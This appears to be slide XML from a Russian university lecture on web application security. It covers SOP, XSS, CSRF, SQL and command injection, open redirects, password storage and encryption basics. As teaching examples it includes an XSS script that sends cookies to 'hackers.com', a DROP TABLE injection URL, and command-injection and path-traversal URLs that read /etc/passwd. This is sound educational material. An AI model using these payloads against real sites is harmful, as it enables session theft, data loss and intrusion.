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PT Mono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TMon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a7ff8c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56a7ff8cae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6a7ff8ca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6a7ff8cae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6a7ff8ca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56a7ff8cae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a7ff8ca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6a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8c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6a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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cbbf090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4cbbf090c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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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6a7ff8ca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56a7ff8cae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fe9878f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4fe9878f7b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a7ff8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6a7ff8ca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a7ff8c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6a7ff8ca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a7ff8c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6a7ff8cae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a7ff8c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6a7ff8cae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6a7ff8c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56a7ff8cae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a7ff8c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56a7ff8cae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a7ff8ca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6a7ff8cae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лист">
  <p:cSld name="Титульный лист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ul_001.jp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401053" y="2286008"/>
            <a:ext cx="8424895" cy="3318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"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="7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191689" y="6142307"/>
            <a:ext cx="2634258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C1010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745934" y="1653722"/>
            <a:ext cx="208001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506"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2531"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2531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ерминология">
  <p:cSld name="Терминология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одзаголовок и текст">
  <p:cSld name="Заголовок, подзаголовок и текст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2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03" name="Google Shape;10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2" type="body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3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12" name="Google Shape;11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>
            <p:ph idx="2" type="pic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текст и картинка">
  <p:cSld name="Заголовок, текст и картинка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4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20" name="Google Shape;12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>
            <p:ph idx="2" type="pic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люсы и минусы">
  <p:cSld name="Плюсы и минусы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15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30" name="Google Shape;13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0020D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Merriweather Sans"/>
              <a:buChar char="+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2" type="body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0020D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Merriweather Sans"/>
              <a:buChar char="-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5" name="Google Shape;135;p15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4324117" y="1596571"/>
            <a:ext cx="0" cy="4533463"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="C002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вертикальных объекта">
  <p:cSld name="Два вертикальных объекта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16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41" name="Google Shape;14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2" type="body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>
  <p:cSld name="Пустой слайд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47" name="Google Shape;14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006593" y="209073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амятка к шаблону">
  <p:cSld name="Памятка к шаблону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625972" y="1593014"/>
            <a:ext cx="33509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вашем распоряжении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есть следующие слайды:</a:t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Титульный слайд</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342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Содержание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Терминология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Цитата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Заголовок, подзаголовок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Заголовок, текст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Два вертикальных объекта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Только заголовок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Пустой слайд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Контакты</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-234940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" name="Google Shape;23;p3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721809" y="1638555"/>
            <a:ext cx="0" cy="4796078"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="C002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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6454588" y="284448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4867097" y="1593014"/>
            <a:ext cx="35101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акцентов в коде и тексте </a:t>
            </a:r>
            <a:b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слайдах в настройках цвета </a:t>
            </a:r>
            <a:b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 вас есть готовая палитра:</a:t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27" name="Google Shape;27;p3"/>
            <p:cNvSpPr/>
            <p:nvPr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rgbClr val="C002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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr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Используйте готовый набор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иконок</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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и элементов для создания ориентиров на слайде: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одержание">
  <p:cSld name="Содержание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741509" y="236938"/>
            <a:ext cx="1164362" cy="116436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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452222" y="442503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4400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0" sz="34400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1587540" y="2198644"/>
            <a:ext cx="7024688" cy="194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0020D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4135135" y="4681336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b="0" i="0" sz="14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059543" y="258971"/>
            <a:ext cx="6747329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20D"/>
              </a:buClr>
              <a:buSzPts val="2812"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pP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чего нужен код/формула?</a:t>
            </a:r>
            <a:b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Укажите назначение</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2812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11.png" id="61" name="Google Shape;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16" y="374922"/>
            <a:ext cx="691853" cy="63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омашнее задание">
  <p:cSld name="Домашнее задание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66" name="Google Shape;6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217354" y="465988"/>
            <a:ext cx="4099199" cy="48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20D"/>
              </a:buClr>
              <a:buSzPts val="2812"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pP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 №</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2812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C0020D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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611460" y="5001268"/>
            <a:ext cx="1954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Срок сдачи</a:t>
            </a:r>
            <a:endParaRPr sz="1400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1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инал">
  <p:cSld name="Финал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ul_001.jpg" id="73" name="Google Shape;7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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4922750"/>
            <a:ext cx="9144000" cy="20362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2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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2298459" y="2598372"/>
            <a:ext cx="6654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Спасибо</a:t>
            </a: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за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внимание!</a:t>
            </a:r>
            <a:endParaRPr b="1"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>
  <p:cSld name="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83" name="Google Shape;8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текст">
  <p:cSld name="Заголовок и текст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90" name="Google Shape;9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401053" y="2286008"/>
            <a:ext cx="8424895" cy="3318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"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Безопасность веб-приложений</a:t>
            </a:r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2428124" y="6142300"/>
            <a:ext cx="6397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400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Ты пентестер или хакер?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400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6745934" y="1653722"/>
            <a:ext cx="208001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31"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Лекция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SOP и DOM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Веб-страницы могут ссылаться друг на друга (window.open, window.opener и тд)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Если у двух веб-страниц совпадает протокол, хост и порт (кроме IE), эти страницы могут взаимодействовать через js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window.opener.body.innerHTML = 'Hello!'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Если 2 страницы в смежных доменах, (a.group.com и b.group.com) понизили домен до group.com - они могут взаимодействовать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window.domain = 'group.com'; // обе страницы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window.opener.someFunction('data');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SOP и AJAX. CORS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00" y="2121637"/>
            <a:ext cx="7527601" cy="346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SOP и Flash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В отличие от js, Flash ориентируется не на домен сайта, а на домен, с которого был загружен flash-объект.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Для того, чтобы получить доступ к данным домена документа, Flash загружает специальный файл - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="2000"/>
              <a:t>crossdomain.xml</a:t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&lt;cross-domain-policy&gt;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&lt;allow-access-from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	domain="*.mail.ru" to-ports="*"/&gt;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&lt;allow-http-request-headers-from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	domain="*.mail.ru" headers="*"/&gt;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&lt;site-control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	permitted-cross-domain-policies="all"/&gt;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&lt;/cross-domain-policy&gt;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Атаки на веб-приложения. XSS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XSS - Cross Site Scripting</a:t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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t> -  использование непроверенных данных в коде страницы.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Позволяет злоумышленнику разместить вредоносный JavaScript код на вашей странице и выполнить его на компьютере пользователя.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Злоумышленник получает доступ к данным пользователя.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XSS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Как внедрить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тег &lt;script&gt;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возможно, нужно разорвать верстку '"/&gt;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использовать протокол javascript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Как бороться</a:t>
            </a:r>
            <a:endParaRPr b="1"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экранировать выводимые данные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экранировать входные данные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очищать входные данные (теги и атрибуты)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использовать более простые форматы: Wiki / Markdown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XSS. Примеры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Безобидная шалость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&lt;script&gt;alert(1);&lt;/script&gt;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Кража сессии (и как следствие - авторизации)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&lt;script&gt;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	const s = document.createElement('script');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	s.src = 'http://hackers.com/gotIt/?cookie' + encodeURIComponent(document.cookie);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	document.body.appendChild(s);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&lt;/script&gt;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CSRF. Как бороться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Как боротиться</a:t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проверять метод запроса (только POST)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проверять Referer (не надежно)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использовать csrf_token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Создаем длинный, новый для каждого пользователя/запроса ключ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Устанавливаем этот ключ в куки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Добавляем этот ключ к каждой форме на сайте victim.com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Запросы с blog.com не будут содержать этот скрытый токен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CSRF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Cross Site Resource Forgery</a:t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Причина</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>: браузер разрешает кросс-доменные GET-запросы для изображений, js, css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Размещаем на любом посещаемом сайте (blog.com):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&lt;img src="http://victim.com/post?message=wanna+kill+humans"/&gt;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&lt;img src="http://victim.com/logout"/&gt;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В результате - все посетители blog.com, которые авторизованы на victim.com совершат действия, о которых даже не будут знать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Инъекции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075" y="1802976"/>
            <a:ext cx="3902829" cy="45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SQL-инъекции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36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611450" y="1582450"/>
            <a:ext cx="79533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sql = "SELECT * FROM posts WHERE id = " \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+ str(request.GET['post_id'])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sql = "SELECT * FROM posts WHERE id = {id}" \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.format(id=request.GET['post_id'])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cursor.execute(sql)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Эксплуатируем уязвимость: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https://site.ru/post/?post_id=1;DROP TABLE posts;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Терминология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Кодирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>- преобразование данных с целью передачи по определенному каналу связи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Шифрование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>- преобразование данных с целью сокрытия информации от третьего лица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SQL-инъекции. Как бороться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Плейсхолдеры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Использовать ORM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Эскейпить небезопасные данные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SQL-инъекции. А что если?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38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SELECT * FROM posts WHERE id IN ({ids});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SELECT * FROM posts ORDER BY {order_column};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Command injection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39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611450" y="1582450"/>
            <a:ext cx="77292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month = request.GET['month']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cmd = "ls /home/backups/" + month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output = subproces.check_output(cmd, shell=True)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PT Mono"/>
                <a:ea typeface="PT Mono"/>
                <a:cs typeface="PT Mono"/>
                <a:sym typeface="PT Mono"/>
              </a:rPr>
              <a:t># …</a:t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Эксплуатируем уязвимость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http://site.ru/backups/?month=may;cat+/etc/passwd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http://site.ru/backups/?month=../../../../etc/passwd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Fishing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40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75" y="2129575"/>
            <a:ext cx="7663276" cy="3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Open Redirect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41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611450" y="1582450"/>
            <a:ext cx="77292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Как отправить пользователя на фишинговую страницу?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Сокращатели URL-ов</a:t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https://bit.ly/hzchtotam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Open Redirect</a:t>
            </a:r>
            <a:endParaRPr b="1"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https://site.ru/login?next=https://fake-site.ru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Домашнее задание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42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611461" y="1582445"/>
            <a:ext cx="75276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/>
              <a:t>Сделать капчу для входа по логин/паролю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/>
              <a:t>Защититься от CSRF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/>
              <a:t>До четверга прислать по 3 пункта, которые вы хотели бы, чтобы мы осветили в следующей лекции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Как хранить и передавать пароли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Не храните пароль в чистом виде. MD5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Не храните MD5 в чистом виде. Соль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Не используйте слово "Соль" в качестве соли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Не передавайте пароли в GET-запросах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Не выводите пароли в логах сервера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Не выводите пароли на странице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Не показывайте, что пароль к данному логину не совпадает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Симметричное шифрование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Алиса и Боб обладают общим секретным ключом (К)</a:t>
            </a:r>
            <a:endParaRPr sz="20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Алиса шифрует текст (Т) с помощью К, получают шифрограмму (Ш)</a:t>
            </a:r>
            <a:endParaRPr sz="20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Алиса передает шифрограмму (Ш) по незащищенному каналу связи (TCP например)</a:t>
            </a:r>
            <a:endParaRPr sz="20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 Боб получает шифрограмму (Ш)</a:t>
            </a:r>
            <a:endParaRPr sz="20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Боб расшифровывает ее с помощью ключа (К) и получает исходный текст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Симметричное шифрование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Плюсы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>: Быстро!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Минусы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>: нужен общий ключ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Примеры</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>: AES, DES, Blowfish, ГОСТ 28147-89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Ас</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>имметричное шифрование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Использует пара связанных ключей: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-RU" sz="2000"/>
              <a:t>Открытый</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t> (public) - для шифрования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-RU" sz="2000"/>
              <a:t>Закрытый</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t> (private - для дешифрования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Алиса, используя открытый ключ Боба, создает шифрограмму и передает ее</a:t>
            </a:r>
            <a:endParaRPr sz="20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Боб, используя закрытый ключ, дешифрует ее и получает исходный текст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Сертификаты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Цифровой сертификат </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>- цифровой документ, подтверждающий принадлежность владельцу публичного ключа (на некоторое время)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Каждый сертификат связан с центром с центром сертификации, который его изготовил и подписал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Сертификационные центры образуют иерархию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Корневые центры известны априори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SSL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Secured Socket Layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t> - безопасное соединение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Свойства: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аутентификация сервера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опциональная аутентификация клиента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шифрование канала передачи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целостность сообщений (защита от изменений)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поддерживает различные алгоритмы шифрования и обмена ключами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HTTPS - HTTP поверх SSL (443 порт)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Безопасность на стороне клиента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Цель</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>: исключить нежелательное взаимодействие между сторонними сайтами.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Сторонние сайты - сайты на разных доменах.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Same Origin Policy (SOP). Общий принцип</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>: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данные, установленные в одном домене, будут видны только в нем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браузер запрещает вызывать js-методы объектов из другого домена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браузер запрещает кроссдоменные запросы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